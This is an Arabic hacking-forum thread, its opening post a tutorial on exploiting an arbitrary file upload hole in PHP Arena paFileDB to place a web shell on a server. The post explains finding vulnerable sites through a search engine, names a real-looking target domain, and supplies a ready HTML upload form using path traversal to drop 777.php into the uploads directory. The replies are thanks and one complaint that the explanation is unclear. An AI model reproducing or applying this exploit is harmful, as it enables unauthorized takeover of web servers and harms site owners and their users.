اختراق سيرفر كام بثغرة بسيطة جدا

اختراق سيرفر كام بثغرة بسيطة جدا


النتائج 1 إلى 9 من 9

الموضوع: اختراق سيرفر كام بثغرة بسيطة جدا

  1. #1

    افتراضي اختراق سيرفر كام بثغرة بسيطة جدا


    بسم الله الرحمن الرحيم

    شرح ثغرة
    PHP Arena paFileDB
    وأستغلالها.
    ============
    الثغرة تمكنك من رفع أي ملف على الموقع وبذلك نستطيع رفع شيل على الموقع وأختراق السيرفر بالكامل.
    ============
    (البرامج المصابه)
    PHP Arena paFileDB 1.1.3
    PHP Arena paFileDB 2.1.1
    PHP Arena paFileDB 3.0 Beta 3.1
    PHP Arena paFileDB 3.0
    PHP Arena paFileDB 3.1
    ============
    أذهب إلى أي محرك بحث منثل جوجل
    وأكتب أيا من البرامج السابقة مثلا:
    PHP Arena paFileDB 3.1
    راح تطلع لنا مواقع كثيرة نختار منها على سبيل المثال:
    http://www.truez.com/download
    نضيف عليه هالوصلة:
    includes/team/file.php
    ليصبح:
    http://www.truez.com/download/includes/team/file.php
    الأن ضع اللنك في المتصفح وأضغط أنتر:
    إذا طلع لك هكذا
    [ ] - [ ] - [ ]
    يعني الموقع مصاب بالثغرة.
    الأن لرفع ملف إلى الموقع نتبع الخطوات التالية:
    1- نعمل مجلد على القرص C: ونسميه مثلا: Virus
    2- الأن نضع بداخله الملف المراد نقله على الموقع ونسميه مثلا 777.php
    3- الأن ننسخ هذا الكود ونضعه بملف txt ثم عند الحفظ نسميه Virus.html:
    ======================
    <html><body>
    <form ENCTYPE="multipart/form-data" method="POST" action="http://www.truez.com/download/includes/team/file.php">
    <input name="userfile" TYPE="file"><br>
    <input name="userfile_name" TYPE="text" value="../../../uploads/777.php"><br>
    <input type="hidden" name="action" value="team">
    <input type="hidden" name="tm" value="file">
    <input type="hidden" name="file" value="upload">
    <input type="hidden" name="upload" value="do">
    <input type=submit name=submit value="doit">
    </form>
    </body></html>
    ======================
    مع مراعاة تغيير:
    http://www.truez.com/download/includes/team/file.php
    إلى الموقع المصاب.
    و
    777.php
    إلى إسم الملف (أتركه كما هو لأنه نحن غيرنا أسمه إلى (777
    4- الأن أفتح الصفحة بالمستعرض Internet Explorer وفي الفراغ الأول أختار الملف 777.php الذي كنا نريد ترفيعه ثم أضغط على doit عندها سينتقل الملف إلى الموقع عن طريق الثغرة.
    ويمكننا أستعراضه من هذا اللنك:
    http://www.truez.com/download/uploads/777.php

    لا تـــغــزي الا بـقـوم قـد غـزت

    وألا خــلـيــ الـمـغــازيــ لــهــلــهــا



  2. #2

    افتراضي رد: اختراق سيرفر كام بثغرة بسيطة جدا

    شكرااا لك

  3. #3

    افتراضي رد: اختراق سيرفر كام بثغرة بسيطة جدا

    اقتباس المشاركة الأصلية كتبت بواسطة 3aziz_ziza3 مشاهدة المشاركة
    شكرااا لك
    لا شكر على واجب حبيبي
    منووووووور
    لا تـــغــزي الا بـقـوم قـد غـزت

    وألا خــلـيــ الـمـغــازيــ لــهــلــهــا



  4. #4

    افتراضي رد: اختراق سيرفر كام بثغرة بسيطة جدا


  5. #5

    افتراضي رد: اختراق سيرفر كام بثغرة بسيطة جدا

    اقتباس المشاركة الأصلية كتبت بواسطة mer.vip مشاهدة المشاركة
    منووووور حبيبي
    لا حرمناك ولا حرمنا جديدك
    لا تـــغــزي الا بـقـوم قـد غـزت

    وألا خــلـيــ الـمـغــازيــ لــهــلــهــا



  6. #6

    افتراضي رد: اختراق سيرفر كام بثغرة بسيطة جدا

    يعطيك العافية

  7. #7

    افتراضي رد: اختراق سيرفر كام بثغرة بسيطة جدا

    بارك الله فيك
    يعطيك العافيه

    عندما تولد ياابن آدم يؤذن لك فى أذنك من غير صلاة
    و عندما تموت يصلى عليك من غير آذان
    وكأن حياتك فى الدنيا ليست سوى الوقت الذى تقضيه بين الآذان و الصلاة
    فلا تقضيها بما لاينفع الإسلام
    و الحمد لله على نعمة الإسلام


  8. #8

    افتراضي رد: اختراق سيرفر كام بثغرة بسيطة جدا

    يعطيك العافية
    (¯`*•.¸,¤°´'`°¤,¸.•*´¯)
    ¸,¤°´'`°•.¸O¸.•°´'`°¤,¸
    ஐ◄█▓▒░جيوش الهكرز░▒▓█►ஐ
    【•سُبْحَانَ اللَّهِ وَبِحَمْدِهِ ،•، سُبْحَانَ اللَّه الْعَظِيم•】
    00•●●•00

    استغفر الله العظيم
    اللهم لك الحمد حمدا كثيرا طيبا مباركا فيه
    اشهد أن لا إلة إلأ الله وحده لاشريك لة وأشهد ان محمد عبده ورسوله


  9. #9

    افتراضي رد: اختراق سيرفر كام بثغرة بسيطة جدا

    مش فاهم الشرح

المواضيع المتشابهه

  1. اختراق موقعين بثغرة sql الكم التطبيق
    بواسطة Iraqe Hacker في المنتدى معرض الانجازات
    مشاركات: 38
    آخر مشاركة: 04-03-2013, 05:47 PM
  2. اختراق موقع بثغرة سهلة للمبتدئين
    بواسطة rami mcee في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 31
    آخر مشاركة: 11-09-2012, 03:54 PM
  3. درس اختراق المواقع المصابة بثغرة sql
    بواسطة The shadow في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 23
    آخر مشاركة: 05-24-2012, 01:48 AM
  4. ثلاث مواقع مصابة بثغرة Admin bypass بسيطة الاستغلال
    بواسطة HaCKer011 في المنتدى قسم الثغرات
    مشاركات: 3
    آخر مشاركة: 05-11-2012, 05:34 PM
  5. الدرس الثاني احتراف اختراق المواقع بثغرة sql
    بواسطة The shadow في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 31
    آخر مشاركة: 03-25-2012, 04:04 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •